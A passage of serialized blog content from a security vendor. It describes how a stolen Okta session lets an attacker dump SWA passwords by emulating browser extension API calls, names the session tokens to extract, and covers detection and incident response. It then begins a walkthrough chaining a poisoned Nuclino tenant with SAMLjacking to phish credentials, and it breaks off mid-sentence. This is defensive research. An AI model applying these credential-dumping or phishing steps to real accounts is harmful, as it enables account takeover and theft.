controls.",{"data":59649,"content":59650,"nodeType":860},{},[59651],{"data":59652,"marks":59653,"value":59654,"nodeType":864},{},[],"However, if even a temporary compromise of an Okta account is achieved (for example through an Okta session theft), an attacker extracting all credentials for SWA apps does not need to maintain access to Okta any further. Instead, they can maintain persistent access to all the downstream SWA apps by logging in manually, using the credentials they have extracted without using Okta. ",{"data":59656,"content":59657,"nodeType":860},{},[59658],{"data":59659,"marks":59660,"value":59661,"nodeType":864},{},[],"This greatly complicates incident response playbooks. Where an otherwise simple recovery action like disabling an Okta account, resetting the password and MFA methods, et cetera, would kick an attacker out of the Okta account - for a user using SWA the attacker will still have all the access to downstream SWA applications unless every single SWA app user account is recovered as well. This is where the value of a federated identity becomes clear.",{"data":59663,"content":59666,"nodeType":996},{"target":59664},{"sys":59665},{"id":58370,"type":1001,"linkType":1002},[],{"data":59668,"content":59669,"nodeType":1009},{},[59670],{"data":59671,"marks":59672,"value":59673,"nodeType":864},{},[],"Dumping SWA credentials",{"data":59675,"content":59676,"nodeType":860},{},[59677],{"data":59678,"marks":59679,"value":59680,"nodeType":864},{},[],"Since Okta SWA functions as a password manager, and it’s also possible to bypass password reveal restrictions, an attacker who has gained temporary access to an Okta session can automate the extraction of all credentials stored via SWA for that account.",{"data":59682,"content":59683,"nodeType":1312},{},[59684],{"data":59685,"marks":59686,"value":59687,"nodeType":864},{},[],"Using the password reveal API",{"data":59689,"content":59690,"nodeType":860},{},[59691],{"data":59692,"marks":59693,"value":59694,"nodeType":864},{},[],"One method would be to automate the password reveal API call in the dashboard for every app configured. This is the simplest, direct way to get credentials but has the disadvantage that it will not return credentials that have had password reveal disabled. The following screenshots show an example of the API call that is made:",{"data":59696,"content":59700,"nodeType":996},{"target":59697},{"sys":59698},{"id":59699,"type":1001,"linkType":1002},"27xCaphfwy6zSNU7QDQZ1g",[],{"data":59702,"content":59706,"nodeType":996},{"target":59703},{"sys":59704},{"id":59705,"type":1001,"linkType":1002},"begENC8Oxq4rwprZ0fGpG",[],{"data":59708,"content":59709,"nodeType":1312},{},[59710],{"data":59711,"marks":59712,"value":59713,"nodeType":864},{},[],"Using the browser extension API",{"data":59715,"content":59716,"nodeType":860},{},[59717],{"data":59718,"marks":59719,"value":59720,"nodeType":864},{},[],"The more effective way for an attacker to dump credentials, and bypass password reveal restrictions, is to emulate the API calls made by the browser extension to retrieve the login scripts for each SWA application. ",{"data":59722,"content":59723,"nodeType":860},{},[59724],{"data":59725,"marks":59726,"value":59727,"nodeType":864},{},[],"For an attacker to make these calls, a valid Okta session is needed. Specifically, the tokens that need to be extracted from the browser for these calls are:",{"data":59729,"content":59730,"nodeType":941},{},[59731,59741],{"data":59732,"content":59733,"nodeType":945},{},[59734],{"data":59735,"content":59736,"nodeType":860},{},[59737],{"data":59738,"marks":59739,"value":59740,"nodeType":864},{},[],"The access token in “okta-token-storage” in browser local storage",{"data":59742,"content":59743,"nodeType":945},{},[59744],{"data":59745,"content":59746,"nodeType":860},{},[59747],{"data":59748,"marks":59749,"value":59750,"nodeType":864},{},[],"The “idx” token in cookies",{"data":59752,"content":59753,"nodeType":860},{},[59754],{"data":59755,"marks":59756,"value":59757,"nodeType":864},{},[],"These can be seen below:",{"data":59759,"content":59763,"nodeType":996},{"target":59760},{"sys":59761},{"id":59762,"type":1001,"linkType":1002},"4ooNI3TmnxqCAtw9MZuuVI",[],{"data":59765,"content":59769,"nodeType":996},{"target":59766},{"sys":59767},{"id":59768,"type":1001,"linkType":1002},"6rbgLXHewT34SPH3qA24Fu",[],{"data":59771,"content":59772,"nodeType":860},{},[59773],{"data":59774,"marks":59775,"value":59776,"nodeType":864},{},[],"The following screenshot shows the use of a simple internal PoC we created to investigate logging detection opportunities. It gives a sense of the type of information that can be retrieved for a test Okta user account: ",{"data":59778,"content":59782,"nodeType":996},{"target":59779},{"sys":59780},{"id":59781,"type":1001,"linkType":1002},"5lYhdtWKVqIch6CpksR7Dd",[],{"data":59784,"content":59785,"nodeType":1009},{},[59786],{"data":59787,"marks":59788,"value":59789,"nodeType":864},{},[],"So if SWA can be risky, is SAML and OIDC safe?",{"data":59791,"content":59792,"nodeType":860},{},[59793],{"data":59794,"marks":59795,"value":59796,"nodeType":864},{},[],"In general, much more so, but as is unfortunately so often the case in security, the answer is “it depends.” The threat profile for federated SSO like SAML and OIDC is very different, and they don’t suffer from the risks highlighted with SWA use given above. ",{"data":59798,"content":59799,"nodeType":860},{},[59800,59805],{"data":59801,"marks":59802,"value":59804,"nodeType":864},{},[59803],{"type":899},"Any organization using Okta should strive to use SAML/OIDC for as many applications as possible - this is the true power of a federated identity solution",{"data":59806,"marks":59807,"value":2924,"nodeType":864},{},[],{"data":59809,"content":59810,"nodeType":860},{},[59811],{"data":59812,"marks":59813,"value":59814,"nodeType":864},{},[],"However, it’s important to remember that not even SAML/OIDC isn't a silver bullet.",{"data":59816,"content":59817,"nodeType":860},{},[59818],{"data":59819,"marks":59820,"value":59821,"nodeType":864},{},[],"For example, it’s still possible for an attacker achieving a temporary compromise of an Okta account to click every single SAML/OIDC application to establish authenticated sessions with all of them. While some sessions may be short-lived, depending on the application, these sessions may stay alive for longer periods such as 30 days or for some apps even indefinitely. ",{"data":59823,"content":59824,"nodeType":860},{},[59825],{"data":59826,"marks":59827,"value":59828,"nodeType":864},{},[],"While it may be simple for incident responders to disable an Okta account temporarily, it’s certainly much more difficult to disable all connected SaaS accounts and/or kill active sessions for all of them. ",{"data":59830,"content":59831,"nodeType":860},{},[59832],{"data":59833,"marks":59834,"value":59835,"nodeType":864},{},[],"Additionally, while active sessions won’t generally allow an attacker long-term access to an application like stolen SWA credentials often will, many different SaaS applications support methods that can be used to effectively backdoor access to them - though this is a risk to both SWA and federated identities.",{"data":59837,"content":59838,"nodeType":860},{},[59839],{"data":59840,"marks":59841,"value":59842,"nodeType":864},{},[],"This is another big challenge for incident responders to deal with, as it can allow attacks to maintain persistence without requiring valid credentials or active sessions. In other words, there are many ways to turn that short term access into persistent access outside Okta. ",{"data":59844,"content":59845,"nodeType":860},{},[59846,59850,59857],{"data":59847,"marks":59848,"value":59849,"nodeType":864},{},[],"While the full details of these persistence attacks are outside the scope of this article, more details on some key attacks can be found in a resource we created called the ",{"data":59851,"content":59852,"nodeType":883},{"uri":6418},[59853],{"data":59854,"marks":59855,"value":47375,"nodeType":864},{},[59856],{"type":1455},{"data":59858,"marks":59859,"value":59860,"nodeType":864},{},[],". Some of the most common techniques that apply here are:",{"data":59862,"content":59863,"nodeType":941},{},[59864,59884,59905,59925,59946],{"data":59865,"content":59866,"nodeType":945},{},[59867],{"data":59868,"content":59869,"nodeType":860},{},[59870,59873,59881],{"data":59871,"marks":59872,"value":21,"nodeType":864},{},[],{"data":59874,"content":59875,"nodeType":883},{"uri":39734},[59876],{"data":59877,"marks":59878,"value":59880,"nodeType":864},{},[59879],{"type":1455},"SAT1004 - API keys",{"data":59882,"marks":59883,"value":21,"nodeType":864},{},[],{"data":59885,"content":59886,"nodeType":945},{},[59887],{"data":59888,"content":59889,"nodeType":860},{},[59890,59893,59902],{"data":59891,"marks":59892,"value":21,"nodeType":864},{},[],{"data":59894,"content":59896,"nodeType":883},{"uri":59895},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/link_sharing/description.md",[59897],{"data":59898,"marks":59899,"value":59901,"nodeType":864},{},[59900],{"type":1455},"SAT1022 - Link sharing",{"data":59903,"marks":59904,"value":21,"nodeType":864},{},[],{"data":59906,"content":59907,"nodeType":945},{},[59908],{"data":59909,"content":59910,"nodeType":860},{},[59911,59914,59922],{"data":59912,"marks":59913,"value":21,"nodeType":864},{},[],{"data":59915,"content":59916,"nodeType":883},{"uri":19131},[59917],{"data":59918,"marks":59919,"value":59921,"nodeType":864},{},[59920],{"type":1455},"SAT1017 - Ghost logins",{"data":59923,"marks":59924,"value":21,"nodeType":864},{},[],{"data":59926,"content":59927,"nodeType":945},{},[59928],{"data":59929,"content":59930,"nodeType":860},{},[59931,59934,59943],{"data":59932,"marks":59933,"value":21,"nodeType":864},{},[],{"data":59935,"content":59937,"nodeType":883},{"uri":59936},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/oauth_tokens/description.md",[59938],{"data":59939,"marks":59940,"value":59942,"nodeType":864},{},[59941],{"type":1455},"SAT1027 - OAuth tokens",{"data":59944,"marks":59945,"value":21,"nodeType":864},{},[],{"data":59947,"content":59948,"nodeType":945},{},[59949],{"data":59950,"content":59951,"nodeType":860},{},[59952,59955,59964],{"data":59953,"marks":59954,"value":21,"nodeType":864},{},[],{"data":59956,"content":59958,"nodeType":883},{"uri":59957},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/shadow_workflows/description.md",[59959],{"data":59960,"marks":59961,"value":59963,"nodeType":864},{},[59962],{"type":1455},"SAT1033 - Shadow workflows",{"data":59965,"marks":59966,"value":21,"nodeType":864},{},[],{"data":59968,"content":59969,"nodeType":1009},{},[59970],{"data":59971,"marks":59972,"value":59973,"nodeType":864},{},[],"Investigating and detecting an Okta account compromise",{"data":59975,"content":59976,"nodeType":860},{},[59977],{"data":59978,"marks":59979,"value":59980,"nodeType":864},{},[],"The good news is there are multiple Okta log events that can be used for either investigating a breach or providing some detection mechanisms via a SIEM. Three key log events are as follows:",{"data":59982,"content":59983,"nodeType":941},{},[59984,59999,60014],{"data":59985,"content":59986,"nodeType":945},{},[59987],{"data":59988,"content":59989,"nodeType":860},{},[59990,59995],{"data":59991,"marks":59992,"value":59994,"nodeType":864},{},[59993],{"type":899},"Show password event",{"data":59996,"marks":59997,"value":59998,"nodeType":864},{},[]," - indicates when a user has clicked the reveal password button",{"data":60000,"content":60001,"nodeType":945},{},[60002],{"data":60003,"content":60004,"nodeType":860},{},[60005,60010],{"data":60006,"marks":60007,"value":60009,"nodeType":864},{},[60008],{"type":899},"Evaluation of sign-on policy",{"data":60011,"marks":60012,"value":60013,"nodeType":864},{},[]," - occurs when the browser extension requests credentials",{"data":60015,"content":60016,"nodeType":945},{},[60017],{"data":60018,"content":60019,"nodeType":860},{},[60020,60025],{"data":60021,"marks":60022,"value":60024,"nodeType":864},{},[60023],{"type":899},"User single sign on to app",{"data":60026,"marks":60027,"value":60028,"nodeType":864},{},[]," - occurs when a full app login is performed",{"data":60030,"content":60034,"nodeType":996},{"target":60031},{"sys":60032},{"id":60033,"type":1001,"linkType":1002},"23G5QvwzgyTEJBJ33Ut7NJ",[],{"data":60036,"content":60037,"nodeType":860},{},[60038],{"data":60039,"marks":60040,"value":60041,"nodeType":864},{},[],"Using these events in a post-compromise situation could potentially significantly reduce the response actions required. If there is clear evidence that the attacker only accessed a limited number of applications, focus can be placed on disabling those accounts and removing potential backdoors, as opposed to having to perform containment procedures for every single application the user has access to.",{"data":60043,"content":60044,"nodeType":1312},{},[60045],{"data":60046,"marks":60047,"value":60048,"nodeType":864},{},[],"Short time-window detection",{"data":60050,"content":60051,"nodeType":860},{},[60052],{"data":60053,"marks":60054,"value":60055,"nodeType":864},{},[],"While the events above are great for investigation, they are all expected events during normal use of Okta by a user. Perhaps the “show password” event may be rarer, but it would still not be completely unusual to see. ",{"data":60057,"content":60058,"nodeType":860},{},[60059],{"data":60060,"marks":60061,"value":60062,"nodeType":864},{},[],"This makes detection more difficult as defenders need to separate malicious logins from legitimate logins, a notoriously difficult task.",{"data":60064,"content":60065,"nodeType":860},{},[60066],{"data":60067,"marks":60068,"value":60069,"nodeType":864},{},[],"For proactive detection, one option would be to detect unusually large numbers of these events in a short time window for the same user account. This would be especially effective against automated tools. It would be much more unusual to see a legitimate user login to every app or reveal every password all in one go, or even all in one day. On the other hand, an attacker may seek to compromise all applications in a short time window.",{"data":60071,"content":60072,"nodeType":860},{},[60073],{"data":60074,"marks":60075,"value":60076,"nodeType":864},{},[],"Given below is an example of the flurry of logs generated by running our internal SWA password dumping tool shown earlier. You can see they are all generated in a very short time window:",{"data":60078,"content":60082,"nodeType":996},{"target":60079},{"sys":60080},{"id":60081,"type":1001,"linkType":1002},"2PaCRx02gpTyYOiuJ85x9Y",[],{"data":60084,"content":60085,"nodeType":860},{},[60086],{"data":60087,"marks":60088,"value":60089,"nodeType":864},{},[],"The only difficulty here is picking sensible numbers for the minimum number of apps and maximum time window required in order to generate a detection event. This would likely need customizing to individual environments based on what number of applications are typical for a user to have access to.",{"data":60091,"content":60092,"nodeType":860},{},[60093,60097,60106],{"data":60094,"marks":60095,"value":60096,"nodeType":864},{},[],"For more general Okta detection rule options, consider checking out the Okta rules contained in the open-source ",{"data":60098,"content":60100,"nodeType":883},{"uri":60099},"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta",[60101],{"data":60102,"marks":60103,"value":60105,"nodeType":864},{},[60104],{"type":1455},"Sigma rule repository on GitHub",{"data":60107,"marks":60108,"value":2924,"nodeType":864},{},[],{"data":60110,"content":60111,"nodeType":1009},{},[60112],{"data":60113,"marks":60114,"value":60115,"nodeType":864},{},[],"Guidance for incident response",{"data":60117,"content":60118,"nodeType":860},{},[60119],{"data":60120,"marks":60121,"value":60122,"nodeType":864},{},[],"If there is one key takeaway from this article, it’s that responding to an Okta account compromise isn’t as simple as disabling the user’s Okta account and/or resetting passwords and MFA factors.",{"data":60124,"content":60125,"nodeType":860},{},[60126],{"data":60127,"marks":60128,"value":60129,"nodeType":864},{},[],"Once an attacker has compromised an Okta account, it should be initially assumed that all connected application accounts are also compromised, whether they use SAML, OIDC or SWA. ",{"data":60131,"content":60132,"nodeType":860},{},[60133],{"data":60134,"marks":60135,"value":60136,"nodeType":864},{},[],"If SWA is used, incident responders should also explore whether those passwords are compromised and whether any other accounts that potentially share those passwords are compromised. ",{"data":60138,"content":60139,"nodeType":860},{},[60140],{"data":60141,"marks":60142,"value":60143,"nodeType":864},{},[],"We’re going to assume all applications/credentials were accessed for the following containment advice, as it’s likely that even moderately-skilled attackers would have tools to automate this. ",{"data":60145,"content":60146,"nodeType":860},{},[60147],{"data":60148,"marks":60149,"value":60150,"nodeType":864},{},[],"A full belt and braces containment exercise would involve the following activities:",{"data":60152,"content":60153,"nodeType":941},{},[60154,60164,60174,60184],{"data":60155,"content":60156,"nodeType":945},{},[60157],{"data":60158,"content":60159,"nodeType":860},{},[60160],{"data":60161,"marks":60162,"value":60163,"nodeType":864},{},[],"Disabling/resetting the Okta account",{"data":60165,"content":60166,"nodeType":945},{},[60167],{"data":60168,"content":60169,"nodeType":860},{},[60170],{"data":60171,"marks":60172,"value":60173,"nodeType":864},{},[],"Disabling/resetting every single connected application account",{"data":60175,"content":60176,"nodeType":945},{},[60177],{"data":60178,"content":60179,"nodeType":860},{},[60180],{"data":60181,"marks":60182,"value":60183,"nodeType":864},{},[],"Identifying any other accounts that may share compromised SWA passwords for investigation and disabling/resetting",{"data":60185,"content":60186,"nodeType":945},{},[60187],{"data":60188,"content":60189,"nodeType":860},{},[60190],{"data":60191,"marks":60192,"value":60193,"nodeType":864},{},[],"Investigating every connected application account for signs of backdooring through multiple persistence techniques",{"data":60195,"content":60196,"nodeType":860},{},[60197],{"data":60198,"marks":60199,"value":60200,"nodeType":864},{},[],"The last point on investigating potential backdoors is particularly important because of the following reasons:",{"data":60202,"content":60203,"nodeType":941},{},[60204,60234],{"data":60205,"content":60206,"nodeType":945},{},[60207],{"data":60208,"content":60209,"nodeType":860},{},[60210,60214,60221,60224,60231],{"data":60211,"marks":60212,"value":60213,"nodeType":864},{},[],"Even if every application user account is temporarily disabled while passwords are reset etc, re-enabling the account could re-activate the attacker’s access if they have made use of persistence techniques like ",{"data":60215,"content":60216,"nodeType":883},{"uri":39734},[60217],{"data":60218,"marks":60219,"value":39740,"nodeType":864},{},[60220],{"type":1455},{"data":60222,"marks":60223,"value":902,"nodeType":864},{},[],{"data":60225,"content":60226,"nodeType":883},{"uri":19131},[60227],{"data":60228,"marks":60229,"value":19137,"nodeType":864},{},[60230],{"type":1455},{"data":60232,"marks":60233,"value":21,"nodeType":864},{},[],{"data":60235,"content":60236,"nodeType":945},{},[60237],{"data":60238,"content":60239,"nodeType":860},{},[60240,60244,60252],{"data":60241,"marks":60242,"value":60243,"nodeType":864},{},[],"Even if all application user accounts are disabled, even permanently, techniques like ",{"data":60245,"content":60246,"nodeType":883},{"uri":59895},[60247],{"data":60248,"marks":60249,"value":60251,"nodeType":864},{},[60250],{"type":1455},"link sharing",{"data":60253,"marks":60254,"value":60255,"nodeType":864},{},[]," can enable attackers to maintain access to data because link sharing decouples the access from being reliant on control of a user account.",{"data":60257,"content":60258,"nodeType":1009},{},[60259],{"data":60260,"marks":60261,"value":58288,"nodeType":864},{},[],{"data":60263,"content":60264,"nodeType":860},{},[60265],{"data":60266,"marks":60267,"value":60268,"nodeType":864},{},[],"We’ve covered a lot of ground here, so let’s take a quick step back to understand the key points of impact:",{"data":60270,"content":60271,"nodeType":941},{},[60272,60282,60292,60302,60312,60322],{"data":60273,"content":60274,"nodeType":945},{},[60275],{"data":60276,"content":60277,"nodeType":860},{},[60278],{"data":60279,"marks":60280,"value":60281,"nodeType":864},{},[],"Attackers can extract passwords for SWA apps, even if password reveal has been disabled - to be clear, this is not a bug, it’s just a technical limitation on how this style of password manager login has to work",{"data":60283,"content":60284,"nodeType":945},{},[60285],{"data":60286,"content":60287,"nodeType":860},{},[60288],{"data":60289,"marks":60290,"value":60291,"nodeType":864},{},[],"SWA passwords set by administrators should not be considered secret from the users as they can be accessed via the extension API",{"data":60293,"content":60294,"nodeType":945},{},[60295],{"data":60296,"content":60297,"nodeType":860},{},[60298],{"data":60299,"marks":60300,"value":60301,"nodeType":864},{},[],"Attackers gaining temporary control of an Okta user account can establish authenticated sessions with SAML/OIDC applications. ",{"data":60303,"content":60304,"nodeType":945},{},[60305],{"data":60306,"content":60307,"nodeType":860},{},[60308],{"data":60309,"marks":60310,"value":60311,"nodeType":864},{},[],"These sessions won’t automatically be revoked if the Okta user account is disabled/reset in response to compromise",{"data":60313,"content":60314,"nodeType":945},{},[60315],{"data":60316,"content":60317,"nodeType":860},{},[60318],{"data":60319,"marks":60320,"value":60321,"nodeType":864},{},[],"There are multiple common attack techniques to gain persistent access to SaaS applications.  ",{"data":60323,"content":60324,"nodeType":945},{},[60325],{"data":60326,"content":60327,"nodeType":860},{},[60328],{"data":60329,"marks":60330,"value":60331,"nodeType":864},{},[],"An attacker can potentially gain permanent access to many connected Okta applications even if efforts are made to reset individual application accounts",{"data":60333,"content":60334,"nodeType":1009},{},[60335],{"data":60336,"marks":60337,"value":24968,"nodeType":864},{},[],{"data":60339,"content":60340,"nodeType":860},{},[60341],{"data":60342,"marks":60343,"value":60344,"nodeType":864},{},[],"While many of these attacks are not unique to Okta, it is one of the most widely used products because it supports many apps, but it supports these apps using methods that have very different risk profiles. ",{"data":60346,"content":60347,"nodeType":860},{},[60348],{"data":60349,"marks":60350,"value":60351,"nodeType":864},{},[],"From a security perspective (and whatever your chosen identity platform), our recommendation would be to use SAML (the strongest auth method) where possible. If that isn’t available, use OIDC. If neither is an option, use password managers (like SWA), which in practise leads to far less reused passwords. ",{"data":60353,"content":60354,"nodeType":860},{},[60355],{"data":60356,"marks":60357,"value":60358,"nodeType":864},{},[],"Unfortunately the state of modern cloud app landscape means that you will be paying a lot more to get many apps using federated SSO, and even then many will still not support this at any license tier, so the use of passwords is still going to be part of the solution.",{"data":60360,"content":60361,"nodeType":860},{},[60362],{"data":60363,"marks":60364,"value":60365,"nodeType":864},{},[],"As we have seen in this article, an attacker can use a compromised SSO session to perform a number of follow-up attacks. Whether using SWA or SAML/OIDC it’s possible to gain authenticated sessions on connected apps and also potentially backdoor access to them.",{"data":60367,"content":60368,"nodeType":860},{},[60369],{"data":60370,"marks":60371,"value":60372,"nodeType":864},{},[],"When using SWA, it’s additionally possible to extract SWA passwords even when password reveal is disabled and potentially gain access to passwords shared with other accounts. This requires additional actions as part of your breach recovery processes/play-books.",{"data":60374,"content":60375,"nodeType":860},{},[60376],{"data":60377,"marks":60378,"value":60379,"nodeType":864},{},[],"There are multiple log events that can be used by security teams to investigate and respond to Okta account compromises and potentially detect them too. Additionally, strong incident response procedures need to be in place for dealing with compromised Okta or any other SSO accounts that factor in the ability for an attacker to laterally move to all the connected applications. Therefore, plans need to include revoking their access to those as well and investigating them for signs of backdoor persistence techniques.","Abusing Okta's SWA authentication","We'll cover the implications of using Okta's SWA authentication method. Learn what security teams need to know in an account breach and IR scenario. ","2023-11-30T00:00:00.000Z","okta-swa",{"items":60385},[60386,60388],{"sys":60387,"name":297},{"id":2732},{"sys":60389,"name":342},{"id":6596},{"items":60391},[60392],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":60393},{"url":4955},{"__typename":2059,"sys":60395,"content":60396,"title":5236,"synopsis":60848,"hashTags":59,"publishedDate":60849,"slug":59151,"tagsCollection":60850,"authorsCollection":60856},{"id":58881},{"json":60397},{"data":60398,"content":60399,"nodeType":856},{},[60400,60418,60425,60432,60438,60454,60461,60478,60485,60492,60499,60506,60513,60520,60527,60547,60554,60561,60567,60574,60581,60588,60594,60600,60606,60613,60620,60626,60633,60640,60647,60653,60660,60667,60674,60681,60688,60694,60701,60708,60714,60721,60728,60734,60740,60747,60814,60821,60827,60834,60841],{"data":60401,"content":60402,"nodeType":860},{},[60403,60407,60414],{"data":60404,"marks":60405,"value":60406,"nodeType":864},{},[],"We published the ",{"data":60408,"content":60409,"nodeType":883},{"uri":6418},[60410],{"data":60411,"marks":60412,"value":5765,"nodeType":864},{},[60413],{"type":1455},{"data":60415,"marks":60416,"value":60417,"nodeType":864},{},[]," on GitHub, which is an open-source research project to demonstrate the multitude of attacks that are possible against SaaS-native and hybrid SaaS organizations. On release day it contained 38 different techniques. ",{"data":60419,"content":60420,"nodeType":860},{},[60421],{"data":60422,"marks":60423,"value":60424,"nodeType":864},{},[],"However, we know it’s not just individual attack techniques and the phases of the cyber kill chain that matter - it’s also how you chain attacks together. Two lower risk vulnerabilities chained together could be a critical issue.",{"data":60426,"content":60427,"nodeType":860},{},[60428],{"data":60429,"marks":60430,"value":60431,"nodeType":864},{},[],"In this article, we’re going to demonstrate that by combining two of our favorite new SaaS attack techniques, poisoned tenants and SAMLjacking, you can make a simple, but effective attack chain.",{"data":60433,"content":60434,"nodeType":1009},{},[60435],{"data":60436,"marks":60437,"value":58596,"nodeType":864},{},[],{"data":60439,"content":60440,"nodeType":860},{},[60441,60444,60451],{"data":60442,"marks":60443,"value":21,"nodeType":864},{},[],{"data":60445,"content":60446,"nodeType":883},{"uri":58605},[60447],{"data":60448,"marks":60449,"value":58610,"nodeType":864},{},[60450],{"type":1455},{"data":60452,"marks":60453,"value":58614,"nodeType":864},{},[],{"data":60455,"content":60456,"nodeType":1009},{},[60457],{"data":60458,"marks":60459,"value":60460,"nodeType":864},{},[],"What the hell is SAMLjacking?",{"data":60462,"content":60463,"nodeType":860},{},[60464,60467,60474],{"data":60465,"marks":60466,"value":21,"nodeType":864},{},[],{"data":60468,"content":60469,"nodeType":883},{"uri":40614},[60470],{"data":60471,"marks":60472,"value":5272,"nodeType":864},{},[60473],{"type":1455},{"data":60475,"marks":60476,"value":60477,"nodeType":864},{},[]," is where an attacker makes use of SAML SSO configuration settings for a SaaS tenant they control in order to redirect users to a malicious link of their choosing during the authentication process. This can be highly effective for phishing as the original URL will be a legitimate SaaS URL and users are expecting to provide credentials.",{"data":60479,"content":60480,"nodeType":1009},{},[60481],{"data":60482,"marks":60483,"value":60484,"nodeType":864},{},[],"What’s the benefit of combining them?",{"data":60486,"content":60487,"nodeType":860},{},[60488],{"data":60489,"marks":60490,"value":60491,"nodeType":864},{},[],"A poisoned tenant on its own could be an epic supply chain attack if you get really lucky. Imagine discovering an organization was wanting to migrate to Slack and then catching some key teams with a Slack poisoned tenant and gradually getting the whole organization migrated over. You’d have a goldmine of information as an administrator of the platform.",{"data":60493,"content":60494,"nodeType":860},{},[60495],{"data":60496,"marks":60497,"value":60498,"nodeType":864},{},[],"However, it might be hard to trick a whole organization into using an attacker controlled slack instance without anyone realizing, but it could be a lot easier to successfully invite e.g. a marketing team into using/adopting a new marketing app that helps them do SEO. This might be easier to perform, but it doesn't really give the attacker valuable data in the poisoned tenant of the marketing app, so it seems a bit pointless.",{"data":60500,"content":60501,"nodeType":860},{},[60502],{"data":60503,"marks":60504,"value":60505,"nodeType":864},{},[],"On the other hand, what about SAMLjacking? It’s a great technique on its own, but you still need to get users to login to the app. Sure, you’ll be sending them a legitimate SaaS URL with a valid TLS certificate etc and so it’s going to pass the sniff test for many people and also bypass email security appliances and similar security tools. However, you’re still effectively phishing them for credentials, the one thing we train users to be most suspicious about, so there is still a possibility they will spot the attack. ",{"data":60507,"content":60508,"nodeType":860},{},[60509],{"data":60510,"marks":60511,"value":60512,"nodeType":864},{},[],"But what if you could combine these techniques so that a poisoned tenant didn’t need to be a big, juicy target to be useful and a SAMLjacking attack didn’t even necessarily require phishing someone directly? What if the attack could be successful just from a target accessing their own bookmarks or open tabs for an app they already use?",{"data":60514,"content":60515,"nodeType":860},{},[60516],{"data":60517,"marks":60518,"value":60519,"nodeType":864},{},[],"In a combination scenario, a user doesn't need to be phished for SAMLjacking. One day they go back to their tab and it's logged out and they get SAMLjacked while logging back in. They don't have to click a link in an email. That’s what we are talking about here, so let’s consider an example of this making use of the SaaS-based wiki, Nuclino.",{"data":60521,"content":60522,"nodeType":1009},{},[60523],{"data":60524,"marks":60525,"value":60526,"nodeType":864},{},[],"An example attack - Nuclino",{"data":60528,"content":60529,"nodeType":860},{},[60530,60534,60543],{"data":60531,"marks":60532,"value":60533,"nodeType":864},{},[],"Before moving on, I’d just like to point out that this isn’t a vulnerability with ",{"data":60535,"content":60537,"nodeType":883},{"uri":60536},"https://www.nuclino.com/",[60538],{"data":60539,"marks":60540,"value":60542,"nodeType":864},{},[60541],{"type":1455},"Nuclino",{"data":60544,"marks":60545,"value":60546,"nodeType":864},{},[]," per se and it won’t be limited to Nuclino either. I’ve used Nuclino as an example because it’s a great wiki platform we use at Push Security, so I’m familiar with it. ",{"data":60548,"content":60549,"nodeType":860},{},[60550],{"data":60551,"marks":60552,"value":60553,"nodeType":864},{},[],"It also allows custom SAML authentication, both as part of its free trial and as part of its lowest tier paid plan. This should be commended as many SaaS apps don’t support SAML or other forms of SSO, and many of those that do charge a huge premium via enterprise plans to gain access to it. We love you Nuclino, sorry!",{"data":60555,"content":60556,"nodeType":860},{},[60557],{"data":60558,"marks":60559,"value":60560,"nodeType":864},{},[],"We'll take a walkthrough of how the attack chain works now. However, if you'd like to jump straight to a demo of the attack then checkout the video here:",{"data":60562,"content":60566,"nodeType":996},{"target":60563},{"sys":60564},{"id":60565,"type":1001,"linkType":1002},"3y6ZMPPsbh6PYlQ7IOxOzS",[],{"data":60568,"content":60569,"nodeType":860},{},[60570],{"data":60571,"marks":60572,"value":60573,"nodeType":864},{},[],"Next, we'll do a full walkthrough of the attack.",{"data":60575,"content":60576,"nodeType":1312},{},[60577],{"data":60578,"marks":60579,"value":60580,"nodeType":864},{},[],"Step 1 - Setup a poisoned tenant and invite target users",{"data":60582,"content":60583,"nodeType":860},{},[60584],{"data":60585,"marks":60586,"value":60587,"nodeType":864},{},[],"The first step for an adversary is to set up their poisoned tenant and then make use of the invite functionality to target some employees of the target organization. With Nuclino, you can either do this by sending sharing links directly to the target or invite them through the Nuclino app, and it will send out legit email invitations on your behalf.",{"data":60589,"content":60593,"nodeType":996},{"target":60590},{"sys":60591},{"id":60592,"type":1001,"linkType":1002},"740nQhGSFp2nFU1b4DP7Mp",[],{"data":60595,"content":60599,"nodeType":996},{"target":60596},{"sys":60597},{"id":60598,"type":1001,"linkType":1002},"4GFL1L7Mmp3nnBODwC9SbH",[],{"data":60601,"content":60605,"nodeType":996},{"target":60602},{"sys":60603},{"id":60604,"type":1001,"linkType":1002},"7KUWKFFlDyvBVoM3MEhPwR",[],{"data":60607,"content":60608,"nodeType":1312},{},[60609],{"data":60610,"marks":60611,"value":60612,"nodeType":864},{},[],"Step 2 - Target responds to the invitation or later signs up for Nuclino",{"data":60614,"content":60615,"nodeType":860},{},[60616],{"data":60617,"marks":60618,"value":60619,"nodeType":864},{},[],"The interesting thing here is that whether the target signs up for Nuclino directly from the joining link or they sign up for an account separately in future, they get mapped to the workspace they have been invited to by default.",{"data":60621,"content":60625,"nodeType":996},{"target":60622},{"sys":60623},{"id":60624,"type":1001,"linkType":1002},"2GlTHcT1cpQ44jb5lN9dr4",[],{"data":60627,"content":60628,"nodeType":1312},{},[60629],{"data":60630,"marks":60631,"value":60632,"nodeType":864},{},[],"Step 3 - Configure a malicious SAML server",{"data":60634,"content":60635,"nodeType":860},{},[60636],{"data":60637,"marks":60638,"value":60639,"nodeType":864},{},[],"Once the adversary has a critical mass of users on their poisoned tenant, they can later engage the SAMLjacking attack. ",{"data":60641,"content":60642,"nodeType":860},{},[60643],{"data":60644,"marks":60645,"value":60646,"nodeType":864},{},[],"To do this, they need to configure a custom SAML server. You can point this to a fake authentication provider they control that mirrors the appearance of the SSO provider the target users are accustomed to using in order to capture credentials.",{"data":60648,"content":60652,"nodeType":996},{"target":60649},{"sys":60650},{"id":60651,"type":1001,"linkType":1002},"1RbhUTZd5Ak4UvjiZhub4V",[],{"data":60654,"content":60655,"nodeType":860},{},[60656],{"data":60657,"marks":60658,"value":60659,"nodeType":864},{},[],"If you toggle the setting to require SSO, existing users will be sent emails prompting them to link their accounts to SSO. That leads to two possible paths to a user compromise.",{"data":60661,"content":60662,"nodeType":1009},{},[60663],{"data":60664,"marks":60665,"value":60666,"nodeType":864},{},[],"Paths to user compromise ",{"data":60668,"content":60669,"nodeType":1312},{},[60670],{"data":60671,"marks":60672,"value":60673,"nodeType":864},{},[],"The first 